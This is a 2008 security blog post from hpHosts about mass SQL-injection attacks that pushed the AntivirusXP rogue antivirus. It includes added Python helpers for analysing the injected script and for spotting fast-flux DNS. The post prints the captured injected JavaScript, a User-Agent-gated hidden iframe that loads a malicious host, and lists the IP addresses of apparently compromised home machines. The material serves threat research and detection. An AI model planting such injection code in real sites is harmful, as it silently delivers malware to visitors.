Blog for hpHosts, and whatever else I feel like writing about ....

Monday 8 September 2008

SQL Exploitified!

I've been seeing these for some time now (indeed, I've been seeing attempts at exploiting the hpHosts server since at least May), and figured I'd collate a list of those known to have been around, both old and new.

See the following for the results of those that were live/dead as of a few minutes ago (note that there have been thousands of these domains since the attacks against everyone began; the list doesn't include them all, as not all of them have been documented (or if they were, I couldn't locate them)):

http://hosts-file.net/misc/SQL_Injection_Attacks.html

Some of the domains were found courtesy of the fantastic list at:

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

I had planned to do a write-up on how the exploit was attempted, but Michael (Bloombit) has done a much more detailed job than I had planned, so I'll leave that to him.

Connie also submitted one of these for inclusion in hpHosts toward the end of August, and further analysis saw the domain it led to change from time to time, before it finally pointed back to itself:

http://forum.hosts-file.net/viewtopic.php?p=4945#p4945

In all cases, however, both old and new, the final result was the exploit attempting to peddle the now well-known rogue, AntivirusXP. See the following for an example:


*****************************************************************
vURL Desktop Edition v0.3.4 Results
Source code for: http://www.19ssl.net/script.js
Server IP: 84.157.239.55 [ p549DEF37.dip.t-dialin.net ]
        > 12.202.254.90 [ 12-202-254-90.client.mchsi.com ]
        > 76.104.72.250 [ c-76-104-72-250.hsd1.va.comcast.net ]
        > 24.1.175.116 [ c-24-1-175-116.hsd1.il.comcast.net ]
        > 200.165.57.31 [ Resolution failed ]
        > 75.49.217.223 [ adsl-75-49-217-223.dsl.emhril.sbcglobal.net ]
        > 121.170.44.90 [ Resolution failed ]
        > 87.116.180.136 [ cable-87-116-180-136.dynamic.sbb.rs ]
        > 69.37.33.66 [ JERRY_DESK ]
        > 71.193.25.70 [ c-71-193-25-70.hsd1.ca.comcast.net ]
        > 76.170.105.146 [ cpe-76-170-105-146.socal.res.rr.com ]
        > 70.218.74.127 [ 127.sub-70-218-74.myvzw.com ]
        > 68.80.34.22 [ c-68-80-34-22.hsd1.pa.comcast.net ]
        > 12.203.121.61 [ 12-203-121-61.client.mchsi.com ]
        > 79.179.170.191 [ bzq-79-179-170-191.red.bezeqint.net ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 1
Date: 08 September 2008
Time: 23:16:15:16
*****************************************************************
if(navigator.userAgent.indexOf('AntivirXP08')==-1){
document.write("<iframe src=http://aspx46.com/cgi-bin/index.cgi?script width=0 height=0 frameborder=0></iframe>");
}


vURL Online:
http://vurl.mysteryfcm.co.uk/?url=http://www.19ssl.net/script.js&selUAStr=1&cbxLinks=on&cbxSource=on&cbxBlacklist=on
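To make explicit what the captured script.js above actually does, here is an added analysis helper (my own example, not code from this post or from the malware): it pulls out the User-Agent marker the script gates on and the hidden iframe URL it writes, and emulates the gate for a given User-Agent. The regex patterns, the function names and the two sample User-Agent strings are my assumptions; the script body is the one captured above.

```python
import re

# The script body captured by vURL above (the page's own sample, reproduced verbatim).
INJECTED_SCRIPT = """if(navigator.userAgent.indexOf('AntivirXP08')==-1){
document.write("<iframe src=http://aspx46.com/cgi-bin/index.cgi?script width=0 height=0 frameborder=0></iframe>");
}"""

# Patterns are assumptions tuned to this family's style: a User-Agent gate and a
# document.write() that drops a zero-sized iframe.
UA_GATE_RE = re.compile(
    r"navigator\.userAgent\.indexOf\(\s*['\"]([^'\"]+)['\"]\s*\)\s*==\s*-1")
DOC_WRITE_RE = re.compile(r"document\.write\(\s*(['\"])(.*?)\1\s*\)", re.S)
IFRAME_TAG_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SRC_RE = re.compile(r"\bsrc=['\"]?([^'\"\s>]+)", re.I)


def _is_hidden(tag: str) -> bool:
    """Zero width and height: the usual way a drive-by iframe stays invisible."""
    return (re.search(r"\bwidth=['\"]?0\b", tag, re.I) is not None
            and re.search(r"\bheight=['\"]?0\b", tag, re.I) is not None)


def analyse_script(js: str) -> dict:
    """Extract the UA markers the script checks for and the iframe URLs it writes."""
    hidden, visible = [], []
    for _quote, html in DOC_WRITE_RE.findall(js):
        for tag in IFRAME_TAG_RE.findall(html):
            src = SRC_RE.search(tag)
            if not src:
                continue
            (hidden if _is_hidden(tag) else visible).append(src.group(1))
    return {
        "ua_markers": UA_GATE_RE.findall(js),
        "hidden_iframes": hidden,
        "visible_iframes": visible,
    }


def would_inject(report: dict, user_agent: str) -> bool:
    """Emulate the gate: the iframe is written only when no marker is in the UA string.

    The check implies that a machine already running the rogue carries the marker in
    its User-Agent and is skipped, so an analysis box has to fetch with a plain UA
    (as vURL did above) to see the payload at all.
    """
    return all(marker not in user_agent for marker in report["ua_markers"])


if __name__ == "__main__":
    report = analyse_script(INJECTED_SCRIPT)
    print(report)
    # Two made-up User-Agent strings: a clean box and one carrying the marker.
    for ua in ("Mozilla/5.0 (Windows NT 5.1)",
               "Mozilla/4.0 (compatible; MSIE 7.0; AntivirXP08)"):
        print(ua, "->", "inject" if would_inject(report, ua) else "skip")
```

The practical takeaway is the gate: if your sandbox or scanner identifies itself with anything containing the marker, the script looks harmless, so always fetch suspect scripts with a stock browser User-Agent and then read the source rather than trusting what rendered.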

... and, not surprisingly, almost all of the newer ones I've spotted have used fast flux. Oh, and nope, the "NESCO Accounting and Finance" displayed on all of the resulting sites' homepages isn't real either ;o)
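The resolution list for www.19ssl.net above (one hostname, fifteen addresses, nearly all with consumer-broadband reverse DNS) is what fast flux looks like from the outside. As an added example that is not part of the original post, the following heuristic scores one snapshot of A records by the number of distinct addresses, the spread across /16 prefixes and the share of residential-looking PTR names. The token list, the thresholds and the "normal site" comparison records (in the 203.0.113.0/24 documentation range, made up here) are my assumptions, and a single snapshot cannot see the short TTLs and churn between successive lookups that a production fast-flux detector would also track.

```python
import ipaddress

# Resolution results for www.19ssl.net copied from the vURL output above
# (IP, reverse DNS name; None where vURL reported "Resolution failed").
RESOLUTIONS_19SSL = [
    ("84.157.239.55", "p549DEF37.dip.t-dialin.net"),
    ("12.202.254.90", "12-202-254-90.client.mchsi.com"),
    ("76.104.72.250", "c-76-104-72-250.hsd1.va.comcast.net"),
    ("24.1.175.116", "c-24-1-175-116.hsd1.il.comcast.net"),
    ("200.165.57.31", None),
    ("75.49.217.223", "adsl-75-49-217-223.dsl.emhril.sbcglobal.net"),
    ("121.170.44.90", None),
    ("87.116.180.136", "cable-87-116-180-136.dynamic.sbb.rs"),
    ("69.37.33.66", "JERRY_DESK"),
    ("71.193.25.70", "c-71-193-25-70.hsd1.ca.comcast.net"),
    ("76.170.105.146", "cpe-76-170-105-146.socal.res.rr.com"),
    ("70.218.74.127", "127.sub-70-218-74.myvzw.com"),
    ("68.80.34.22", "c-68-80-34-22.hsd1.pa.comcast.net"),
    ("12.203.121.61", "12-203-121-61.client.mchsi.com"),
    ("79.179.170.191", "bzq-79-179-170-191.red.bezeqint.net"),
]

# Constructed comparison: an ordinary site on two hosts in one hosting /24
# (documentation range 203.0.113.0/24, not a real server).
NORMAL_SITE = [
    ("203.0.113.10", "web1.example-hosting.net"),
    ("203.0.113.11", "web2.example-hosting.net"),
]

# Substrings that in reverse DNS usually mean consumer broadband. An assumption and
# deliberately crude: it misses "JERRY_DESK", which is plainly somebody's home PC.
RESIDENTIAL_TOKENS = ("dsl", "cable", "dip.", "dynamic", "hsd1", "res.rr",
                      ".client.", "sub-", "cpe-", "myvzw", "bzq-")


def looks_residential(ptr):
    """True when the reverse name carries one of the broadband tokens."""
    if not ptr:
        return False
    ptr = ptr.lower()
    return any(tok in ptr for tok in RESIDENTIAL_TOKENS)


def assess_fastflux(resolutions, min_ips=5, min_prefixes=4, min_residential=0.5):
    """Score one snapshot of A records. Thresholds are assumptions, not tuned values."""
    ips = {ip for ip, _ in resolutions}
    prefixes = {ipaddress.ip_network(f"{ip}/16", strict=False) for ip in ips}
    residential = sum(1 for _, ptr in resolutions if looks_residential(ptr))
    fraction = residential / len(resolutions) if resolutions else 0.0
    reasons = []
    if len(ips) >= min_ips:
        reasons.append(f"{len(ips)} distinct addresses for one name")
    if len(prefixes) >= min_prefixes:
        reasons.append(f"spread over {len(prefixes)} /16 prefixes")
    if fraction >= min_residential:
        reasons.append(f"{fraction:.0%} of reverse names look like broadband customers")
    return {
        "distinct_ips": len(ips),
        "distinct_prefixes": len(prefixes),
        "residential_fraction": fraction,
        "reasons": reasons,
        # All three signals together are needed; a CDN can hit the first two alone.
        "fast_flux_suspect": len(reasons) == 3,
    }


if __name__ == "__main__":
    for name, records in (("www.19ssl.net", RESOLUTIONS_19SSL), ("normal site", NORMAL_SITE)):
        verdict = assess_fastflux(records)
        print(name, "->", "SUSPECT" if verdict["fast_flux_suspect"] else "ok", verdict["reasons"])
```

The residential share is the discriminating signal here: a CDN or big load-balanced site also answers with many addresses across many prefixes, but those sit in hosting or provider space, not on cable, DSL and mobile customer lines as every resolvable entry above does.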
